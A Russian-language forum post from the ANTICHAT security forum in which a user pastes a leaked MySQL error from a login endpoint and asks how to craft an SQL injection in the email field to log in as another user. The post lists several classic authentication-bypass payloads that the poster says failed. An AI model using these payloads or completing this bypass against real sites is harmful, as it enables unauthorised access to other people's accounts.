HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу [Помогите]Составить sql запрос
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 21.12.2021, 08:06
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию
{"success":false,"message":"SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '098f6bcd4621d373cade4e832627b4f6', password_salt)) AND isbanned = 0 AND isdele' at line 1 (SQL: select `id`, `current_sign_in_at`, `current_sign_in_ip`, `isadmin_level1`, `isadmin`, `is_superadmin` from `users` where (email = 'RoXQ2bT562lTHlQ4Xm3FJg==' OR username = 'test'') AND BINARY encrypted_password = SHA1(CONCAT('098f6bcd4621d373cade4e832627b4f6', password_salt)) AND isbanned = 0 AND isdeleted = 0 limit 1)","alert":{"title":null,"description":null,"type ":"error"}}

В пост запросе (авторизация юзера) в параметере email есть sql!Как составить запрос чтоб авторизоваться под юзером?

' or 1=1--

" or 1=1--

or 1=1--

' or 'a'='a

" or "a"="a

') or ('a'='a

Не катит
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ